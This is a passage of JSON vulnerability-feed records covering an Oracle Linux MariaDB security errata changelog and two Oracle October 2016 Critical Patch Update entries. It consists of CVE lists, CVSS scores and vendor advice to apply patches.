owner if run by root in mariadb-prepare-db-dir\n Related: #1458940\n- Check properly that datadir includes only expected files\n Related: #1356897\n[1:5.5.56-1]\n- Rebase to 5.5.56\n That release also fixes the following security issues:\n CVE-2016-5617/CVE-2016-6664 CVE-2017-3312 CVE-2017-3238 CVE-2017-3243\n CVE-2017-3244 CVE-2017-3258 CVE-2017-3313 CVE-2017-3317 CVE-2017-3318\n CVE-2017-3291 CVE-2017-3302 CVE-2016-5483/CVE-2017-3600 CVE-2017-3308\n CVE-2017-3309 CVE-2017-3453 CVE-2017-3456 CVE-2017-3464\n Resolves: #1458933\n New deps required by upstream: checkpolicy and policycoreutils-python\n License text removed by upstream: COPYING.LESSER\n Do not ignore test-suite failure\n Downstream script mariadb-prepare-db-dir fixed for CVE-2017-3265\n Resolves: #1458940\n[5.5.52-2]\n- Extension of mariadb-prepare-db-dir script\n- Resolves: #1356897\n- Rebase to 5.5.52, that also include fix for CVE-2016-6662\n Resolves: #1377974", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2192", "href": "http://linux.oracle.com/errata/ELSA-2017-2192.html", "title": "mariadb security and bug fix update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "oracle": [{"lastseen": "2019-05-29T18:20:59", "bulletinFamily": "software", "cvelist": ["CVE-2016-5606", "CVE-2016-5540", "CVE-2016-5630", "CVE-2016-5594", "CVE-2016-5575", "CVE-2016-5609", "CVE-2015-5351", "CVE-2016-8294", "CVE-2016-5565", "CVE-2016-5591", "CVE-2015-1792", "CVE-2016-5498", "CVE-2016-5624", "CVE-2016-5555", "CVE-2014-9296", "CVE-2015-0235", "CVE-2015-1793", "CVE-2016-1546", "CVE-2016-5560", "CVE-2016-5611", "CVE-2014-7809", "CVE-2016-3492", "CVE-2016-5612", "CVE-2015-3197", "CVE-2016-5602", "CVE-2016-5487", "CVE-2016-5505", "CVE-2016-5608", "CVE-2016-5625", "CVE-2016-6306", "CVE-2016-5619", "CVE-2016-5568", "CVE-2016-6663", "CVE-2015-1789", "CVE-2016-5527", "CVE-2016-2183", "CVE-2014-0227", "CVE-2016-5481", 
"CVE-2016-5518", "CVE-2016-8281", "CVE-2016-5631", "CVE-2015-0286", "CVE-2016-2178", "CVE-2016-8288", "CVE-2016-5635", "CVE-2016-5497", "CVE-2015-2568", "CVE-2016-5486", "CVE-2016-5628", "CVE-2015-3195", "CVE-2016-4979", "CVE-2016-5617", "CVE-2016-5621", "CVE-2016-3473", "CVE-2016-5521", "CVE-2016-5543", "CVE-2016-5585", "CVE-2016-5488", "CVE-2016-0714", "CVE-2014-3571", "CVE-2016-8292", "CVE-2016-5588", "CVE-2016-5559", "CVE-2016-5599", "CVE-2016-5539", "CVE-2016-5514", "CVE-2016-5479", "CVE-2016-6302", "CVE-2016-5504", "CVE-2016-6664", "CVE-2016-3551", "CVE-2016-5499", "CVE-2016-2177", "CVE-2016-5604", "CVE-2016-5574", "CVE-2014-9294", "CVE-2010-5312", "CVE-2014-0224", "CVE-2016-5616", "CVE-2016-8296", "CVE-2016-0635", "CVE-2016-2105", "CVE-2016-5557", "CVE-2016-5569", "CVE-2016-2107", "CVE-2016-5553", "CVE-2015-7501", "CVE-2016-5610", "CVE-2016-5577", "CVE-2015-3253", "CVE-2014-9295", "CVE-2016-6307", "CVE-2016-3562", "CVE-2016-1182", "CVE-2016-5566", "CVE-2016-5576", "CVE-2016-5582", "CVE-2016-0763", "CVE-2016-5493", "CVE-2016-5615", "CVE-2016-8285", "CVE-2016-6308", "CVE-2016-5633", "CVE-2016-2180", "CVE-2016-5534", "CVE-2016-5542", "CVE-2016-5513", "CVE-2016-5571", "CVE-2016-5567", "CVE-2016-5597", "CVE-2016-5525", "CVE-2016-8295", "CVE-2014-0099", "CVE-2016-5627", "CVE-2014-2532", "CVE-2016-5500", "CVE-2016-8287", "CVE-2016-2109", "CVE-2016-3505", "CVE-2016-2181", "CVE-2014-0119", "CVE-2016-6304", "CVE-2016-5482", "CVE-2016-5522", "CVE-2014-0114", "CVE-2016-5529", "CVE-2013-4322", "CVE-2016-5515", "CVE-2016-6662", "CVE-2014-0050", "CVE-2016-5595", "CVE-2013-2067", "CVE-2015-0500", "CVE-2016-5596", "CVE-2013-4286", "CVE-2016-1881", "CVE-2015-0382", "CVE-2099-1234", "CVE-2016-5587", "CVE-2016-5480", "CVE-2016-5600", "CVE-2016-5491", "CVE-2016-5586", "CVE-2016-5519", "CVE-2016-5605", "CVE-2015-1788", "CVE-2016-5632", "CVE-2016-5511", "CVE-2016-5578", "CVE-2016-5562", "CVE-2016-5489", "CVE-2016-7052", "CVE-2016-5490", "CVE-2016-5533", "CVE-2013-4590", 
"CVE-2016-5626", "CVE-2016-5583", "CVE-2016-5556", "CVE-2016-1950", "CVE-2016-5607", "CVE-2016-8291", "CVE-2016-0706", "CVE-2016-5492", "CVE-2012-1007", "CVE-2016-5570", "CVE-2016-5516", "CVE-2016-8283", "CVE-2016-5507", "CVE-2016-5537", "CVE-2016-5584", "CVE-2016-5598", "CVE-2015-0409", "CVE-2016-1181", "CVE-2013-2566", "CVE-2015-0423", "CVE-2014-0096", "CVE-2016-5508", "CVE-2016-2176", "CVE-2016-5524", "CVE-2015-1790", "CVE-2016-5510", "CVE-2014-0075", "CVE-2013-4444", "CVE-2016-6305", "CVE-2016-5530", "CVE-2016-5580", "CVE-2016-6303", "CVE-2016-5538", "CVE-2015-1351", "CVE-2016-5523", "CVE-2016-5613", "CVE-2016-5618", "CVE-2016-5601", "CVE-2016-2182", "CVE-2016-5554", "CVE-2016-5535", "CVE-2015-0433", "CVE-2016-8293", "CVE-2016-5589", "CVE-2016-5581", "CVE-2016-5531", "CVE-2016-5620", "CVE-2016-5495", "CVE-2016-5573", "CVE-2016-5564", "CVE-2016-5592", "CVE-2016-5532", "CVE-2015-7940", "CVE-2016-5526", "CVE-2016-5603", "CVE-2016-5517", "CVE-2016-5501", "CVE-2016-5502", "CVE-2016-5634", "CVE-2016-5512", "CVE-2016-5579", "CVE-2016-5561", "CVE-2016-8284", "CVE-2016-5593", "CVE-2016-8290", "CVE-2016-3081", "CVE-2016-2179", "CVE-2016-5503", "CVE-2016-2106", "CVE-2016-7440", "CVE-2016-5558", "CVE-2016-1000031", "CVE-2015-4852", "CVE-2014-9293", "CVE-2016-5536", "CVE-2015-1791", "CVE-2016-5563", "CVE-2016-8289", "CVE-2016-8286", "CVE-2016-6309", "CVE-2016-5572", "CVE-2016-5622", "CVE-2016-5629", "CVE-2016-5506", "CVE-2016-3495", "CVE-2016-5544", "CVE-2015-0411", "CVE-2015-0381"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. 
Please refer to:\n\n[Critical Patch Updates and Security Alerts](<http://www.oracle.com/technetwork/topics/security/alerts-086861.html>) for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of the Common Vulnerability Scoring System (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. 
More information about Oracle's use of CVRF is available [here](<http://www.oracle.com/technetwork/topics/security/cpufaq-098434.html#CVRF>).\n", "modified": "2019-05-16T00:00:00", "published": "2016-10-18T00:00:00", "id": "ORACLE:CPUOCT2016-2881722", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2016", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-04T21:15:59", "bulletinFamily": "software", "cvelist": ["CVE-2010-5312", "CVE-2012-1007", "CVE-2013-2067", "CVE-2013-2566", "CVE-2013-4286", "CVE-2013-4322", "CVE-2013-4444", "CVE-2013-4590", "CVE-2014-0050", "CVE-2014-0075", "CVE-2014-0096", "CVE-2014-0099", "CVE-2014-0114", "CVE-2014-0119", "CVE-2014-0224", "CVE-2014-0227", "CVE-2014-2532", "CVE-2014-3571", "CVE-2014-7809", "CVE-2014-9293", "CVE-2014-9294", "CVE-2014-9295", "CVE-2014-9296", "CVE-2015-0235", "CVE-2015-0286", "CVE-2015-0381", "CVE-2015-0382", "CVE-2015-0409", "CVE-2015-0411", "CVE-2015-0423", "CVE-2015-0433", "CVE-2015-0500", "CVE-2015-1351", "CVE-2015-1788", "CVE-2015-1789", "CVE-2015-1790", "CVE-2015-1791", "CVE-2015-1792", "CVE-2015-1793", "CVE-2015-2568", "CVE-2015-3195", "CVE-2015-3197", "CVE-2015-3253", "CVE-2015-4852", "CVE-2015-5351", "CVE-2015-7501", "CVE-2015-7940", "CVE-2016-0635", "CVE-2016-0706", "CVE-2016-0714", "CVE-2016-0763", "CVE-2016-1000031", "CVE-2016-1181", "CVE-2016-1182", "CVE-2016-1546", "CVE-2016-1881", "CVE-2016-1950", "CVE-2016-2105", "CVE-2016-2106", "CVE-2016-2107", "CVE-2016-2109", "CVE-2016-2176", "CVE-2016-2177", "CVE-2016-2178", "CVE-2016-2179", "CVE-2016-2180", "CVE-2016-2181", "CVE-2016-2182", "CVE-2016-2183", "CVE-2016-3081", "CVE-2016-3473", "CVE-2016-3492", "CVE-2016-3495", "CVE-2016-3505", "CVE-2016-3551", "CVE-2016-3562", "CVE-2016-4979", "CVE-2016-5479", "CVE-2016-5480", "CVE-2016-5481", "CVE-2016-5482", "CVE-2016-5486", "CVE-2016-5487", "CVE-2016-5488", "CVE-2016-5489", "CVE-2016-5490", "CVE-2016-5491", "CVE-2016-5492", "CVE-2016-5493", 
"CVE-2016-5495", "CVE-2016-5497", "CVE-2016-5498", "CVE-2016-5499", "CVE-2016-5500", "CVE-2016-5501", "CVE-2016-5502", "CVE-2016-5503", "CVE-2016-5504", "CVE-2016-5505", "CVE-2016-5506", "CVE-2016-5507", "CVE-2016-5508", "CVE-2016-5510", "CVE-2016-5511", "CVE-2016-5512", "CVE-2016-5513", "CVE-2016-5514", "CVE-2016-5515", "CVE-2016-5516", "CVE-2016-5517", "CVE-2016-5518", "CVE-2016-5519", "CVE-2016-5521", "CVE-2016-5522", "CVE-2016-5523", "CVE-2016-5524", "CVE-2016-5525", "CVE-2016-5526", "CVE-2016-5527", "CVE-2016-5529", "CVE-2016-5530", "CVE-2016-5531", "CVE-2016-5532", "CVE-2016-5533", "CVE-2016-5534", "CVE-2016-5535", "CVE-2016-5536", "CVE-2016-5537", "CVE-2016-5538", "CVE-2016-5539", "CVE-2016-5540", "CVE-2016-5542", "CVE-2016-5543", "CVE-2016-5544", "CVE-2016-5553", "CVE-2016-5554", "CVE-2016-5555", "CVE-2016-5556", "CVE-2016-5557", "CVE-2016-5558", "CVE-2016-5559", "CVE-2016-5560", "CVE-2016-5561", "CVE-2016-5562", "CVE-2016-5563", "CVE-2016-5564", "CVE-2016-5565", "CVE-2016-5566", "CVE-2016-5567", "CVE-2016-5568", "CVE-2016-5569", "CVE-2016-5570", "CVE-2016-5571", "CVE-2016-5572", "CVE-2016-5573", "CVE-2016-5574", "CVE-2016-5575", "CVE-2016-5576", "CVE-2016-5577", "CVE-2016-5578", "CVE-2016-5579", "CVE-2016-5580", "CVE-2016-5581", "CVE-2016-5582", "CVE-2016-5583", "CVE-2016-5584", "CVE-2016-5585", "CVE-2016-5586", "CVE-2016-5587", "CVE-2016-5588", "CVE-2016-5589", "CVE-2016-5591", "CVE-2016-5592", "CVE-2016-5593", "CVE-2016-5594", "CVE-2016-5595", "CVE-2016-5596", "CVE-2016-5597", "CVE-2016-5598", "CVE-2016-5599", "CVE-2016-5600", "CVE-2016-5601", "CVE-2016-5602", "CVE-2016-5603", "CVE-2016-5604", "CVE-2016-5605", "CVE-2016-5606", "CVE-2016-5607", "CVE-2016-5608", "CVE-2016-5609", "CVE-2016-5610", "CVE-2016-5611", "CVE-2016-5612", "CVE-2016-5613", "CVE-2016-5615", "CVE-2016-5616", "CVE-2016-5617", "CVE-2016-5618", "CVE-2016-5619", "CVE-2016-5620", "CVE-2016-5621", "CVE-2016-5622", "CVE-2016-5624", "CVE-2016-5625", "CVE-2016-5626", "CVE-2016-5627", 
"CVE-2016-5628", "CVE-2016-5629", "CVE-2016-5630", "CVE-2016-5631", "CVE-2016-5632", "CVE-2016-5633", "CVE-2016-5634", "CVE-2016-5635", "CVE-2016-6302", "CVE-2016-6303", "CVE-2016-6304", "CVE-2016-6305", "CVE-2016-6306", "CVE-2016-6307", "CVE-2016-6308", "CVE-2016-6309", "CVE-2016-6662", "CVE-2016-6663", "CVE-2016-6664", "CVE-2016-7052", "CVE-2016-7440", "CVE-2016-8281", "CVE-2016-8283", "CVE-2016-8284", "CVE-2016-8285", "CVE-2016-8286", "CVE-2016-8287", "CVE-2016-8288", "CVE-2016-8289", "CVE-2016-8290", "CVE-2016-8291", "CVE-2016-8292", "CVE-2016-8293", "CVE-2016-8294", "CVE-2016-8295", "CVE-2016-8296", "CVE-2099-1234"], "description": "A Critical Patch Update (CPU) is a collection of patches for multiple security vulnerabilities. Critical Patch Update patches are usually cumulative, but each advisory describes only the security fixes added since the previous Critical Patch Update advisory. Thus, prior Critical Patch Update advisories should be reviewed for information regarding earlier published security fixes. Please refer to:\n\nCritical Patch Updates and Security Alerts for information about Oracle Security Advisories.\n\n**Oracle continues to periodically receive reports of attempts to maliciously exploit vulnerabilities for which Oracle has already released fixes. In some instances, it has been reported that attackers have been successful because targeted customers had failed to apply available Oracle patches. Oracle therefore _strongly_ recommends that customers remain on actively-supported versions and apply Critical Patch Update fixes _without_ delay.**\n\nThis Critical Patch Update contains 253 new security fixes across the product families listed below. 
Please note that a blog entry summarizing the content of this Critical Patch Update and other Oracle Software Security Assurance activities is located at <https://blogs.oracle.com/security>.\n\nPlease note that the vulnerabilities in this Critical Patch Update are scored using version 3.0 of the Common Vulnerability Scoring System (CVSS).\n\nThis Critical Patch Update advisory is also available in an XML format that conforms to the Common Vulnerability Reporting Format (CVRF) version 1.1. More information about Oracle's use of CVRF is available here.\n", "modified": "2019-05-16T00:00:00", "published": "2016-10-18T00:00:00", "id": "ORACLE:CPUOCT2016", "href": "", "type": "oracle", "title": "Oracle Critical Patch Update - October 2016", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}